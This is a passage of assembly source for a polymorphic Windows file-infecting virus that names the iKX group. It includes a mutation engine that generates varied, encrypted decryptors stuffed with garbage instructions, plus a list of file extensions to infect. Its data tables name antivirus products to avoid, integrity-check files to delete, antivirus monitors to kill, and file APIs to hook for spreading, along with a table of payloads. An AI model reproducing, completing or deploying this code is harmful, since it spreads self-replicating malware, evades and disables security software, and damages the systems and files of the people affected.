|||
|
stosw
|
|||
|
ret
|
|||
|
|
|||
|
THME_GC_GenFINIT:
|
|||
|
inc byte ptr [ebp+THME_CoproInit]
|
|||
|
mov ax,0E3DBh ; FINIT
|
|||
|
stosw
|
|||
|
ret
|
|||
|
|
|||
|
THME_GBG_MOV_REG16_REG16:
|
|||
|
mov al,66h ; MOV ?X,?X
|
|||
|
stosb
|
|||
|
call THME_GBG_GetValidRiB
|
|||
|
push eax
|
|||
|
mov al,08Bh
|
|||
|
stosb
|
|||
|
pop eax
|
|||
|
stosb
|
|||
|
ret
|
|||
|
|
|||
|
THME_GBG_MOV_REG16_IMM16:
|
|||
|
mov al,66h ; MOV ?X,????
|
|||
|
stosb
|
|||
|
call THME_GetRegister
|
|||
|
add al,0B8h
|
|||
|
stosb
|
|||
|
call random
|
|||
|
stosw
|
|||
|
ret
|
|||
|
|
|||
|
THME_GBG_MOV_REG32_REG32:
|
|||
|
call THME_GBG_GetValidRiB ; MOV E??,E??
|
|||
|
push eax
|
|||
|
mov al,8Bh
|
|||
|
stosb
|
|||
|
pop eax
|
|||
|
stosb
|
|||
|
ret
|
|||
|
|
|||
|
THME_GBG_MOV_REG32_IMM32:
|
|||
|
call THME_GetRegister ; MOV E??,????????
|
|||
|
add al,0B8h
|
|||
|
stosb
|
|||
|
call random
|
|||
|
stosd
|
|||
|
ret
|
|||
|
|
|||
|
THME_GBG_GenPUSHPOP: ; PUSH E??
|
|||
|
mov eax,8 ; ...
|
|||
|
call r_range ; POP E??
|
|||
|
add al,50h
|
|||
|
stosb
|
|||
|
call THME_GenGarbage
|
|||
|
call THME_GetRegister
|
|||
|
add al,58h
|
|||
|
stosb
|
|||
|
ret
|
|||
|
|
|||
|
THME_GBG_GenCALL_Type1: ; CALL @@1
|
|||
|
mov al,0E8h ; ...
|
|||
|
stosb ; JMP @@2
|
|||
|
xor eax,eax ; ...
|
|||
|
stosd ; @@1:
|
|||
|
push edi ; ...
|
|||
|
call THME_GenGarbage ; RET
|
|||
|
mov al,0E9h ; ...
|
|||
|
stosb ; @@2:
|
|||
|
xor eax,eax ; ...
|
|||
|
stosd
|
|||
|
push edi
|
|||
|
call THME_GenGarbage
|
|||
|
mov al,0C3h
|
|||
|
stosb
|
|||
|
call THME_GenGarbage
|
|||
|
mov ebx,edi
|
|||
|
pop edx
|
|||
|
sub ebx,edx
|
|||
|
mov [edx-4],ebx
|
|||
|
pop ecx
|
|||
|
sub edx,ecx
|
|||
|
mov [ecx-4],edx
|
|||
|
ret
|
|||
|
|
|||
|
; ---
|
|||
|
|
|||
|
THME_CryptData: ; Encrypt given data with proper operation
|
|||
|
mov esi,dword ptr [ebp+THME_Data2crypt]
|
|||
|
mov edi,esi
|
|||
|
mov ecx,dword ptr [ebp+THME_S2C_div4]
|
|||
|
THME_CD_EncryptLoop:
|
|||
|
lodsd
|
|||
|
push ecx
|
|||
|
call THME_DoCryptOperations
|
|||
|
pop ecx
|
|||
|
stosd
|
|||
|
loop THME_CD_EncryptLoop
|
|||
|
ret
|
|||
|
|
|||
|
THME_DoCryptOperations:
|
|||
|
test byte ptr [ebp+THME_CryptOp],_XOR
|
|||
|
jz THME_DCO_XOR
|
|||
|
test byte ptr [ebp+THME_CryptOp],_ADD
|
|||
|
jz THME_DCO_ADD
|
|||
|
THME_DCO_SUB:
|
|||
|
add eax,dword ptr [ebp+THME_Key1]
|
|||
|
jmp THME_DCO_EXIT
|
|||
|
THME_DCO_ADD:
|
|||
|
sub eax,dword ptr [ebp+THME_Key1]
|
|||
|
jmp THME_DCO_EXIT
|
|||
|
THME_DCO_XOR:
|
|||
|
xor eax,dword ptr [ebp+THME_Key1]
|
|||
|
THME_DCO_EXIT:
|
|||
|
ret
|
|||
|
|
|||
|
; ---
|
|||
|
|
|||
|
THME_GenDeltaOffset: ; CALL @@1
|
|||
|
mov eax,10h ; ...
|
|||
|
call r_range ; @@1:
|
|||
|
xchg eax,ebx ; POP E??
|
|||
|
mov al,0E8h
|
|||
|
stosb
|
|||
|
xor eax,eax
|
|||
|
stosd
|
|||
|
mov dword ptr [ebp+THME_GDO_TmpCll],edi
|
|||
|
call THME_GenGarbage
|
|||
|
mov ecx,dword ptr [ebp+THME_GDO_TmpCll]
|
|||
|
mov ebx,edi
|
|||
|
sub ebx,ecx
|
|||
|
mov [ecx-4],ebx
|
|||
|
mov al,58h
|
|||
|
add al,byte ptr [ebp+THME_DeltaReg]
|
|||
|
stosb
|
|||
|
mov ebx,dword ptr [ebp+THME_Pointer]
|
|||
|
sub ecx,ebx
|
|||
|
mov dword ptr [ebp+THME_Fix1],ecx
|
|||
|
ret
|
|||
|
|
|||
|
THME_GenLoadSize:
|
|||
|
mov eax,2
|
|||
|
call r_range
|
|||
|
xchg eax,ecx
|
|||
|
jecxz THME_GLS_@@2
|
|||
|
THME_GLS_@@1:
|
|||
|
mov al,68h ; PUSH ????????
|
|||
|
; ...
|
|||
|
stosb ; POP E??
|
|||
|
mov eax,dword ptr [ebp+THME_S2C_div4]
|
|||
|
stosd
|
|||
|
call THME_GenGarbage
|
|||
|
mov al,58h
|
|||
|
add al,byte ptr [ebp+THME_CounterReg]
|
|||
|
stosb
|
|||
|
ret
|
|||
|
THME_GLS_@@2:
|
|||
|
movzx eax,byte ptr [ebp+THME_CounterReg]
|
|||
|
add eax,0B8h ; MOV E??,????????
|
|||
|
stosb
|
|||
|
mov eax,dword ptr [ebp+THME_S2C_div4]
|
|||
|
stosd
|
|||
|
ret
|
|||
|
|
|||
|
THME_GenLoadPointer:
|
|||
|
mov al,8Dh ; LEA E??,[E??+????????]
|
|||
|
stosb
|
|||
|
movzx eax,byte ptr [ebp+THME_PointerReg]
|
|||
|
shl al,3
|
|||
|
add al,10000000b
|
|||
|
add al,byte ptr [ebp+THME_DeltaReg]
|
|||
|
stosb
|
|||
|
mov eax,LIMIT
|
|||
|
sub eax,dword ptr [ebp+THME_Fix1]
|
|||
|
stosd
|
|||
|
ret
|
|||
|
|
|||
|
THME_StoreLoop:
|
|||
|
mov dword ptr [ebp+THME_LoopAddress],edi
|
|||
|
ret
|
|||
|
|
|||
|
THME_GenCryptOperations:
|
|||
|
mov al,81h
|
|||
|
stosb
|
|||
|
test byte ptr [ebp+THME_CryptOp],_XOR
|
|||
|
jz THME_GCO_XOR
|
|||
|
test byte ptr [ebp+THME_CryptOp],_ADD
|
|||
|
jz THME_GCO_ADD
|
|||
|
THME_GCO_SUB:
|
|||
|
mov al,28h ; SUB [E??],????????
|
|||
|
jmp THME_GCO_BuildRiB
|
|||
|
THME_GCO_ADD:
|
|||
|
xor al,al ; ADD [E??],????????
|
|||
|
jmp THME_GCO_BuildRiB
|
|||
|
THME_GCO_XOR:
|
|||
|
mov al,30h ; XOR [E??],????????
|
|||
|
THME_GCO_BuildRiB:
|
|||
|
add al,byte ptr [ebp+THME_PointerReg]
|
|||
|
cmp byte ptr [ebp+THME_PointerReg],_EBP
|
|||
|
jnz THME_GCO_BR_NoEBP
|
|||
|
or al,01000000b
|
|||
|
stosb
|
|||
|
xor al,al
|
|||
|
stosb
|
|||
|
jmp $+3
|
|||
|
THME_GCO_BR_NoEBP:
|
|||
|
stosb
|
|||
|
call random
|
|||
|
mov dword ptr [ebp+THME_Key1],eax
|
|||
|
stosd
|
|||
|
THME_GCO_EXIT:
|
|||
|
ret
|
|||
|
|
|||
|
THME_GenIncPointer:
|
|||
|
mov eax,5
|
|||
|
call r_range
|
|||
|
xchg eax,ecx
|
|||
|
jecxz THME_GIP_@@2
|
|||
|
dec ecx
|
|||
|
jecxz THME_GIP_@@3
|
|||
|
dec ecx
|
|||
|
jecxz THME_GIP_@@4
|
|||
|
dec ecx
|
|||
|
jnz THME_GIP_@@1
|
|||
|
jmp THME_GIP_@@5
|
|||
|
|
|||
|
THME_GIP_@@1:
|
|||
|
mov bl,4 ; ADD E??,4
|
|||
|
call THME_GIP_AddIt
|
|||
|
jmp THME_GIP_EXIT
|
|||
|
|
|||
|
THME_GIP_@@2:
|
|||
|
mov eax,2
|
|||
|
call r_range
|
|||
|
xchg eax,ecx
|
|||
|
jecxz THME_GIP_@@2_@@2
|
|||
|
THME_GIP_@@2_@@1:
|
|||
|
mov bl,3 ; ADD E??,3
|
|||
|
call THME_GIP_AddIt
|
|||
|
mov bl,1 ; INC E??
|
|||
|
call THME_GIP_IncIt
|
|||
|
jmp THME_GIP_@@2_EXIT
|
|||
|
THME_GIP_@@2_@@2:
|
|||
|
mov bl,1 ; INC E??
|
|||
|
call THME_GIP_IncIt
|
|||
|
mov bl,3
|
|||
|
call THME_GIP_AddIt ; ADD E??,3
|
|||
|
THME_GIP_@@2_EXIT:
|
|||
|
jmp THME_GIP_EXIT
|
|||
|
|
|||
|
THME_GIP_@@3:
|
|||
|
mov eax,2
|
|||
|
call r_range
|
|||
|
xchg eax,ecx
|
|||
|
jecxz THME_GIP_@@3_@@2
|
|||
|
THME_GIP_@@3_@@1:
|
|||
|
mov bl,2 ; ADD E??,2
|
|||
|
call THME_GIP_AddIt
|
|||
|
mov bl,2 ; INC E??
|
|||
|
call THME_GIP_IncIt ; INC E??
|
|||
|
jmp THME_GIP_@@2_EXIT
|
|||
|
THME_GIP_@@3_@@2:
|
|||
|
mov bl,2 ; INC E??
|
|||
|
call THME_GIP_IncIt ; INC E??
|
|||
|
mov bl,2 ; ADD E??,2
|
|||
|
call THME_GIP_AddIt
|
|||
|
jmp THME_GIP_@@2_EXIT
|
|||
|
|
|||
|
THME_GIP_@@4:
|
|||
|
mov eax,2
|
|||
|
call r_range
|
|||
|
xchg eax,ecx
|
|||
|
jecxz THME_GIP_@@4_@@2
|
|||
|
THME_GIP_@@4_@@1:
|
|||
|
mov bl,1 ; ADD E??,1
|
|||
|
call THME_GIP_AddIt ; INC E??
|
|||
|
mov bl,3 ; INC E??
|
|||
|
call THME_GIP_IncIt ; INC E??
|
|||
|
jmp THME_GIP_@@2_EXIT
|
|||
|
THME_GIP_@@4_@@2:
|
|||
|
mov bl,1 ; INC E??
|
|||
|
call THME_GIP_IncIt ; INC E??
|
|||
|
mov bl,3 ; INC E??
|
|||
|
call THME_GIP_AddIt ; ADD E??,1
|
|||
|
jmp THME_GIP_@@2_EXIT
|
|||
|
|
|||
|
THME_GIP_@@5: ; INC E??
|
|||
|
mov bl,4 ; INC E??
|
|||
|
call THME_GIP_IncIt ; INC E??
|
|||
|
; INC E??
|
|||
|
|
|||
|
THME_GIP_EXIT:
|
|||
|
ret
|
|||
|
|
|||
|
THME_GIP_AddIt:
|
|||
|
mov al,83h
|
|||
|
stosb
|
|||
|
mov al,byte ptr [ebp+THME_PointerReg]
|
|||
|
or al,11000000b
|
|||
|
stosb
|
|||
|
mov al,bl
|
|||
|
stosb
|
|||
|
ret
|
|||
|
|
|||
|
THME_GIP_IncIt:
|
|||
|
movzx ecx,bl
|
|||
|
mov al,40h
|
|||
|
add al,byte ptr [ebp+THME_PointerReg]
|
|||
|
THME_GIP_II_Loop:
|
|||
|
stosb
|
|||
|
pushad
|
|||
|
call THME_GenGarbage
|
|||
|
popad
|
|||
|
loop THME_GIP_II_Loop
|
|||
|
ret
|
|||
|
|
|||
|
THME_GenDecCounter:
|
|||
|
mov eax,3
|
|||
|
call r_range
|
|||
|
xchg eax,ecx
|
|||
|
jecxz THME_GDC_@@2
|
|||
|
dec ecx
|
|||
|
jecxz THME_GDC_@@3
|
|||
|
THME_GDC_@@1: ; SUB E??,1
|
|||
|
mov al,83h
|
|||
|
stosb
|
|||
|
mov al,byte ptr [ebp+THME_CounterReg]
|
|||
|
or al,11101000b
|
|||
|
stosb
|
|||
|
mov al,1
|
|||
|
stosb
|
|||
|
jmp THME_GDC_EXIT
|
|||
|
THME_GDC_@@2:
|
|||
|
mov al,48h ; DEC E??
|
|||
|
add al,byte ptr [ebp+THME_CounterReg]
|
|||
|
stosb
|
|||
|
jmp THME_GDC_EXIT
|
|||
|
THME_GDC_@@3:
|
|||
|
mov al,83h ; ADD E??,-1
|
|||
|
stosb
|
|||
|
mov al,byte ptr [ebp+THME_CounterReg]
|
|||
|
or al,11000000b
|
|||
|
stosb
|
|||
|
mov al,0FFh
|
|||
|
stosb
|
|||
|
THME_GDC_EXIT:
|
|||
|
ret
|
|||
|
|
|||
|
THME_GenLoop:
|
|||
|
mov ax,850Fh ; JNZ FAR ????????
|
|||
|
stosw
|
|||
|
mov eax,dword ptr [ebp+THME_LoopAddress]
|
|||
|
sub eax,edi
|
|||
|
sub eax,00000004h
|
|||
|
stosd
|
|||
|
ret
|
|||
|
|
|||
|
THME_OneByters label byte
|
|||
|
cld
|
|||
|
cmc
|
|||
|
clc
|
|||
|
stc
|
|||
|
dec eax
|
|||
|
inc eax
|
|||
|
lahf
|
|||
|
nop
|
|||
|
salc
|
|||
|
sTHME_OneByters equ ($-THME_OneByters)
|
|||
|
|
|||
|
THME_Copro label byte
|
|||
|
f2xm1
|
|||
|
fabs
|
|||
|
fadd
|
|||
|
faddp
|
|||
|
fchs
|
|||
|
fnclex
|
|||
|
fcom
|
|||
|
fcomp
|
|||
|
fcompp
|
|||
|
fcos
|
|||
|
fdecstp
|
|||
|
fdiv
|
|||
|
fdivp
|
|||
|
fdivr
|
|||
|
fdivrp
|
|||
|
ffree
|
|||
|
fincstp
|
|||
|
fld1
|
|||
|
fldl2t
|
|||
|
fldl2e
|
|||
|
fldpi
|
|||
|
fldln2
|
|||
|
fldz
|
|||
|
fmul
|
|||
|
fmulp
|
|||
|
fnclex
|
|||
|
fnop
|
|||
|
fpatan
|
|||
|
fprem
|
|||
|
fprem1
|
|||
|
fptan
|
|||
|
frndint
|
|||
|
fscale
|
|||
|
fsin
|
|||
|
fsincos
|
|||
|
fsqrt
|
|||
|
fst
|
|||
|
fstp
|
|||
|
fsub
|
|||
|
fsubp
|
|||
|
fsubr
|
|||
|
fsubrp
|
|||
|
ftst
|
|||
|
fucom
|
|||
|
fucomp
|
|||
|
fucompp
|
|||
|
fxam
|
|||
|
fxtract
|
|||
|
fyl2x
|
|||
|
fyl2xp1
|
|||
|
sTHME_Copro equ (($-THME_Copro)/2)
|
|||
|
|
|||
|
; Possibilities before crypt operation
|
|||
|
|
|||
|
THME_Decrypt1 label byte
|
|||
|
dd offset (THME_Decrypt1a)
|
|||
|
dd offset (THME_Decrypt1b)
|
|||
|
dd offset (THME_Decrypt1c)
|
|||
|
sTHME_Decrypt1 equ (($-THME_Decrypt1)/4)
|
|||
|
|
|||
|
THME_Decrypt1a label byte
|
|||
|
dd offset (THME_GenDeltaOffset)
|
|||
|
dd offset (THME_GenLoadSize)
|
|||
|
dd offset (THME_GenLoadPointer)
|
|||
|
sTHME_Decrypt1a equ (($-THME_Decrypt1a)/4)
|
|||
|
|
|||
|
THME_Decrypt1b label byte
|
|||
|
dd offset (THME_GenDeltaOffset)
|
|||
|
dd offset (THME_GenLoadPointer)
|
|||
|
dd offset (THME_GenLoadSize)
|
|||
|
sTHME_Decrypt1b equ (($-THME_Decrypt1b)/4)
|
|||
|
|
|||
|
THME_Decrypt1c label byte
|
|||
|
dd offset (THME_GenLoadSize)
|
|||
|
dd offset (THME_GenDeltaOffset)
|
|||
|
dd offset (THME_GenLoadPointer)
|
|||
|
sTHME_Decrypt1c equ (($-THME_Decrypt1c)/4)
|
|||
|
|
|||
|
; Main table (for garbage generation)
|
|||
|
|
|||
|
THME_GBG_Table label byte
|
|||
|
dd offset (THME_GBG_Arithmetic_EAX_IMM32)
|
|||
|
dd offset (THME_GBG_Arithmetic_REG32_REG32)
|
|||
|
dd offset (THME_GBG_Arithmetic_REG32_IMM32)
|
|||
|
dd offset (THME_GBG_MOV_REG16_REG16)
|
|||
|
dd offset (THME_GBG_MOV_REG16_IMM16)
|
|||
|
dd offset (THME_GBG_MOV_REG32_REG32)
|
|||
|
dd offset (THME_GBG_MOV_REG32_IMM32)
|
|||
|
dd offset (THME_GBG_GenOneByter)
|
|||
|
dd offset (THME_GBG_GenCopro)
|
|||
|
dd offset (THME_GBG_GenPUSHPOP)
|
|||
|
dd offset (THME_GBG_GenCALL_Type1)
|
|||
|
sTHME_GBG_Table equ (($-THME_GBG_Table)/4)
|
|||
|
|
|||
|
thme_end label byte
|
|||
|
|
|||
|
THME endp
|
|||
|
|
|||
|
; ===========================================================================
|
|||
|
; Random procedures
|
|||
|
; ===========================================================================
|
|||
|
;
|
|||
|
; RANDOM
|
|||
|
;
|
|||
|
; input:
|
|||
|
; Nothing.
|
|||
|
; output:
|
|||
|
; EAX = Random number
|
|||
|
;
|
|||
|
|
|||
|
random proc ; Thanx MDriller! ;)
|
|||
|
push ecx
|
|||
|
mov eax,dword ptr [ebp+rnd_seed1]
|
|||
|
dec dword ptr [ebp+rnd_seed1]
|
|||
|
xor eax,dword ptr [ebp+rnd_seed2]
|
|||
|
mov ecx,eax
|
|||
|
rol dword ptr [ebp+rnd_seed1],cl
|
|||
|
add dword ptr [ebp+rnd_seed2],eax
|
|||
|
adc eax,dword ptr [ebp+rnd_seed2]
|
|||
|
add eax,ecx
|
|||
|
ror eax,cl
|
|||
|
not eax
|
|||
|
sub eax,3
|
|||
|
xor dword ptr [ebp+rnd_seed2],eax
|
|||
|
xor eax,dword ptr [ebp+rnd_seed3]
|
|||
|
rol dword ptr [ebp+rnd_seed3],1
|
|||
|
sub dword ptr [ebp+rnd_seed3],ecx
|
|||
|
sbb dword ptr [ebp+rnd_seed3],4
|
|||
|
inc dword ptr [ebp+rnd_seed2]
|
|||
|
pop ecx
|
|||
|
ret
|
|||
|
random endp
|
|||
|
|
|||
|
; R_RANGE
|
|||
|
;
|
|||
|
; input:
|
|||
|
; EAX = Number of possible random numbers
|
|||
|
; output:
|
|||
|
; EAX = Number between 0 and (EAX-1)
|
|||
|
|
|||
|
r_range proc
|
|||
|
push ecx
|
|||
|
push edx
|
|||
|
mov ecx,eax
|
|||
|
call random
|
|||
|
xor edx,edx
|
|||
|
div ecx
|
|||
|
mov eax,edx
|
|||
|
pop edx
|
|||
|
pop ecx
|
|||
|
ret
|
|||
|
r_range endp
|
|||
|
|
|||
|
; ===========================================================================
|
|||
|
; Virus data
|
|||
|
; ===========================================================================
|
|||
|
; I went to god just to see, and i was looking at me.
|
|||
|
|
|||
|
_MASK db "*."
|
|||
|
EXTENSION dd 00000000h
|
|||
|
|
|||
|
EXTENSIONS db "EXE",0 ; Nice table: very easy to
|
|||
|
db "SCR",0 ; add new extensions to infect
|
|||
|
db "CPL",0
|
|||
|
n_EXT equ (($-offset EXTENSIONS)/4)
|
|||
|
|
|||
|
ALL_MASK db "*.*",0
|
|||
|
|
|||
|
dotdot db "..",0
|
|||
|
root db "c:\",0 ; Don't be afraid... :)
|
|||
|
|
|||
|
key_mIRC db "iKX\Thorin\mIRC32",0
|
|||
|
key_PIRCH db "iKX\Thorin\Pirch32",0
|
|||
|
key_ViRC97 db "iKX\Thorin\ViRC97",0
|
|||
|
|
|||
|
; Whoaaaaa... many many many payloads!
|
|||
|
|
|||
|
payload_table label byte
|
|||
|
dd offset (payload1)
|
|||
|
dd offset (payload2)
|
|||
|
dd offset (payload3)
|
|||
|
dd offset (payload4)
|
|||
|
dd offset (payload5)
|
|||
|
payload_number equ (($-offset payload_table)/4)
|
|||
|
|
|||
|
infections dd 00000000h
|
|||
|
imagebase dd imagebase_
|
|||
|
kernel dd kernel_
|
|||
|
|
|||
|
K32_DLL db "KERNEL32.dll",0
|
|||
|
K32_Size equ $-K32_DLL
|
|||
|
|
|||
|
szSHELL32 db "SHELL32",0
|
|||
|
szUSER32 db "USER32",0
|
|||
|
szADVAPI32 db "ADVAPI32",0
|
|||
|
|
|||
|
szOPEN db "OPEN",0
|
|||
|
szMicro$oft db "http://www.microsoft.com",0 ; Yaaaaaaargh!!!
|
|||
|
|
|||
|
; @@BadProgramz structure
|
|||
|
; ???????????????????????
|
|||
|
; +02h String Size
|
|||
|
; +??h First letters (string size) of files we don't want to be infected
|
|||
|
|
|||
|
@@BadProgramz label byte
|
|||
|
db 02h,"TB" ; ThunderByte?
|
|||
|
db 02h,"F-" ; F-Prot?
|
|||
|
db 03h,"NAV" ; Norton Antivirus?
|
|||
|
db 03h,"AVP" ; AVP?
|
|||
|
db 03h,"WEB" ; DrWeb?
|
|||
|
db 03h,"PAV" ; Panda?
|
|||
|
db 03h,"DRW" ; DrWeb?
|
|||
|
db 04h,"DSAV" ; Dr Solomon?
|
|||
|
db 03h,"NOD" ; Nod-Ice?
|
|||
|
db 06h,"WINICE" ; SoftIce?
|
|||
|
db 06h,"FORMAT" ; Format?
|
|||
|
db 05h,"FDISK" ; Fdisk?
|
|||
|
db 08h,"SCANDSKW" ; ScanDisk?
|
|||
|
db 06h,"DEFRAG" ; Defrag?
|
|||
|
db 0BBh
|
|||
|
|
|||
|
@@BadPhilez label byte ; Files to delete in all dirz
|
|||
|
ANTIVIR_DAT db "ANTI-VIR.DAT",0
|
|||
|
CHKLIST_DAT db "CHKLIST.DAT",0
|
|||
|
CHKLIST_TAV db "CHKLIST.TAV",0
|
|||
|
CHKLIST_MS db "CHKLIST.MS",0
|
|||
|
CHKLIST_CPS db "CHKLIST.CPS",0
|
|||
|
AVP_CRC db "AVP.CRC",0
|
|||
|
IVB_NTZ db "IVB.NTZ",0
|
|||
|
SMARTCHK_MS db "SMARTCHK.MS",0
|
|||
|
SMARTCHK_CPS db "SMARTCHK.CPS",0
|
|||
|
|
|||
|
Monitors2Kill label byte
|
|||
|
db "AVP Monitor",0
|
|||
|
db "Amon Antivirus Monitor",0
|
|||
|
db 0BBh
|
|||
|
|
|||
|
|
|||
|
; @@Hookz structure
|
|||
|
; ?????????????????
|
|||
|
; +00h API Name
|
|||
|
; +??h Bytes from beginning of virus until beginning of hook handler
|
|||
|
|
|||
|
@@Hookz label byte
|
|||
|
?szMoveFileA db "MoveFileA",0
|
|||
|
?hnMoveFileA dd (offset HookMoveFileA)
|
|||
|
|
|||
|
?szCopyFileA db "CopyFileA",0
|
|||
|
?hnCopyFileA dd (offset HookCopyFileA)
|
|||
|
|
|||
|
?szGetFullPathNameA db "GetFullPathNameA",0
|
|||
|
?hnGetFullPathNameA dd (offset HookGetFullPathNameA)
|
|||
|
|
|||
|
?szDeleteFileA db "DeleteFileA",0
|
|||
|
?hnDeleteFileA dd (offset HookDeleteFileA)
|
|||
|
|
|||
|
?szWinExec db "WinExec",0
|
|||
|
?hnWinExec dd (offset HookWinExec)
|
|||
|
|
|||
|
?szCreateProcessA db "CreateProcessA",0
|
|||
|
?hnCreateProcessA dd (offset HookCreateProcessA)
|
|||
|
|
|||
|
?szCreateFileA db "CreateFileA",0
|
|||
|
?hnCreateFileA dd (offset HookCreateFileA)
|
|||
|
|
|||
|
?szGetFileAttributesA db "GetFileAttributesA",0
|
|||
|
?hnGetFileAttributesA dd (offset HookGetFileAttributesA)
|
|||
|
|
|||
|
?szFindFirstFileA db "FindFirstFileA",0
|
|||
|
?hnFindFirstFileA dd (offset HookFindFirstFileA)
|
|||
|
|
|||
|
?szFindNextFileA db "FindNextFileA",0
|
|||
|
?hnFindNextFileA dd (offset HookFindNextFileA)
|
|||
|
|
|||
|
?szHookGetProcAddress db "GetProcAddress",0
|
|||
|
?hnHookGetProcAddress dd (offset HookGetProcAddress)
|
|||
|
|
|||
|
db "" ; How funny ;)
|
|||
|
|
|||
|
@IsDebuggerPresent db "IsDebuggerPresent",0
|
|||
|
|
|||
|
; Hrm, i think i should write some compression engine for that API shit :)
|
|||
|
|
|||
|
@@Namez label byte
|
|||
|
@GetModuleHandleA db "GetModuleHandleA",0
|
|||
|
@LoadLibraryA db "LoadLibraryA",0
|
|||
|
@FindClose db "FindClose",0
|
|||
|
@SetFilePointer db "SetFilePointer",0
|
|||
|
@SetFileAttributesA db "SetFileAttributesA",0
|
|||
|
@CloseHandle db "CloseHandle",0
|
|||
|
@GetCurrentDirectoryA db "GetCurrentDirectoryA",0
|
|||
|
@SetCurrentDirectoryA db "SetCurrentDirectoryA",0
|
|||
|
@GetWindowsDirectoryA db "GetWindowsDirectoryA",0
|
|||
|
@GetSystemDirectoryA db "GetSystemDirectoryA",0
|
|||
|
@CreateFileMappingA db "CreateFileMappingA",0
|
|||
|
@MapViewOfFile db "MapViewOfFile",0
|
|||
|
@UnmapViewOfFile db "UnmapViewOfFile",0
|
|||
|
@SetEndOfFile db "SetEndOfFile",0
|
|||
|
@WriteFile db "WriteFile",0
|
|||
|
@GetTickCount db "GetTickCount",0
|
|||
|
@GetVersion db "GetVersion",0
|
|||
|
@GlobalAlloc db "GlobalAlloc",0
|
|||
|
@GlobalFree db "GlobalFree",0
|
|||
|
@GetFileSize db "GetFileSize",0
|
|||
|
@SetVolumeLabelA db "SetVolumeLabelA",0
|
|||
|
@GetSystemTime db "GetSystemTime",0
|
|||
|
|
|||
|
@@HookedNamez label byte
|
|||
|
@MoveFileA db "MoveFileA",0
|
|||
|
@CopyFileA db "CopyFileA",0
|
|||
|
@GetFullPathNameA db "GetFullPathNameA",0
|
|||
|
@DeleteFileA db "DeleteFileA",0
|
|||
|
@WinExec db "WinExec",0
|
|||
|
@CreateProcessA db "CreateProcessA",0
|
|||
|
@CreateFileA db "CreateFileA",0
|
|||
|
@GetFileAttributesA db "GetFileAttributesA",0
|
|||
|
@FindFirstFileA db "FindFirstFileA",0
|
|||
|
@FindNextFileA db "FindNextFileA",0
|
|||
|
@GetProcAddress db "GetProcAddress",0
|
|||
|
db 0BBh ; I rule! :)
|
|||
|
|
|||
|
@@USER32_APIs label byte
|
|||
|
@SwapMouseButton db "SwapMouseButton",0
|
|||
|
@MessageBoxA db "MessageBoxA",0
|
|||
|
@FindWindowA db "FindWindowA",0
|
|||
|
@PostMessageA db "PostMessageA",0
|
|||
|
db "" ; I like girls...
|
|||
|
|
|||
|
@@ADVAPI32_APIs label byte
|
|||
|
@RegCreateKeyExA db "RegCreateKeyExA",0
|
|||
|
@RegOpenKeyExA db "RegOpenKeyExA",0
|
|||
|
@RegDeleteKeyA db "RegDeleteKeyA",0
|
|||
|
db "" ; And music tho :)
|
|||
|
|
|||
|
@@SHELL32_APIs label byte
|
|||
|
@ShellExecuteA db "ShellExecuteA",0
|
|||
|
|
|||
|
random_seed label byte
|
|||
|
rnd_seed1 dd 00000000h
|
|||
|
rnd_seed2 dd 00000000h
|
|||
|
rnd_seed3 dd 00000000h
|
|||
|
dd 00000000h
|
|||
|
|
|||
|
; THME Poly Engine data
|
|||
|
|
|||
|
THME_CounterReg db 00h
|
|||
|
THME_PointerReg db 00h
|
|||
|
THME_DeltaReg db 00h
|
|||
|
|
|||
|
THME_CoproInit db 00h
|
|||
|
THME_CryptOp db 00h
|
|||
|
|
|||
|
THME_Recursion db 00h
|
|||
|
THME_LoopAddress db 00000000h
|
|||
|
THME_CryptKey dd 00000000h
|
|||
|
THME_Pointer dd 00000000h
|
|||
|
THME_Data2crypt dd 00000000h
|
|||
|
THME_Size2crypt dd 00000000h
|
|||
|
THME_S2C_div4 dd 00000000h
|
|||
|
THME_GDO_TmpCll dd 00000000h
|
|||
|
THME_Fix1 dd 00000000h
|
|||
|
THME_Key1 dd 00000000h ; ADD/SUB/XOR key
|
|||
|
|
|||
|
; Virus data
|
|||
|
|
|||
|
NewSize dd 00000000h
|
|||
|
SearchHandle dd 00000000h
|
|||
|
FileHandle dd 00000000h
|
|||
|
MapHandle dd 00000000h
|
|||
|
MapAddress dd 00000000h
|
|||
|
AddressTableVA dd 00000000h
|
|||
|
NameTableVA dd 00000000h
|
|||
|
OrdinalTableVA dd 00000000h
|
|||
|
TempGA_IT1 dd 00000000h
|
|||
|
TempGA_IT2 dd 00000000h
|
|||
|
TempHandle dd 00000000h
|
|||
|
iobytes dd 00000000h,00000000h,00000000h,00000000h,00000000h
|
|||
|
GlobalAllocHnd dd 00000000h
|
|||
|
GlobalAllocHnd_ dd 00000000h
|
|||
|
TSHandle dd 00000000h
|
|||
|
RegHandle dd 00000000h
|
|||
|
Disposition dd 00000000h
|
|||
|
lpFilePart dd 00000000h
|
|||
|
WFD_HndInMem dd 00000000h
|
|||
|
WFD_Handles_Count db 00h
|
|||
|
CoolFlag db 00h
|
|||
|
inNT db 00h
|
|||
|
CurrentExt db 00h
|
|||
|
|
|||
|
tempcurdir db 7Fh dup (00h)
|
|||
|
|
|||
|
@@Offsetz label byte
|
|||
|
_GetModuleHandleA dd 00000000h
|
|||
|
_LoadLibraryA dd 00000000h
|
|||
|
_FindClose dd 00000000h
|
|||
|
_SetFilePointer dd 00000000h
|
|||
|
_SetFileAttributesA dd 00000000h
|
|||
|
_CloseHandle dd 00000000h
|
|||
|
_GetCurrentDirectoryA dd 00000000h
|
|||
|
_SetCurrentDirectoryA dd 00000000h
|
|||
|
_GetWindowsDirectoryA dd 00000000h
|
|||
|
_GetSystemDirectoryA dd 00000000h
|
|||
|
_CreateFileMappingA dd 00000000h
|
|||
|
_MapViewOfFile dd 00000000h
|
|||
|
_UnmapViewOfFile dd 00000000h
|
|||
|
_SetEndOfFile dd 00000000h
|
|||
|
_WriteFile dd 00000000h
|
|||
|
_GetTickCount dd 00000000h
|
|||
|
_GetVersion dd 00000000h
|
|||
|
_GlobalAlloc dd 00000000h
|
|||
|
_GlobalFree dd 00000000h
|
|||
|
_GetFileSize dd 00000000h
|
|||
|
_SetVolumeLabelA dd 00000000h
|
|||
|
_GetSystemTime dd 00000000h
|
|||
|
@@HookedOffsetz label byte
|
|||
|
_MoveFileA dd 00000000h
|
|||
|
_CopyFileA dd 00000000h
|
|||
|
_GetFullPathNameA dd 00000000h
|
|||
|
_DeleteFileA dd 00000000h
|
|||
|
_WinExec dd 00000000h
|
|||
|
_CreateProcessA dd 00000000h
|
|||
|
_CreateFileA dd 00000000h
|
|||
|
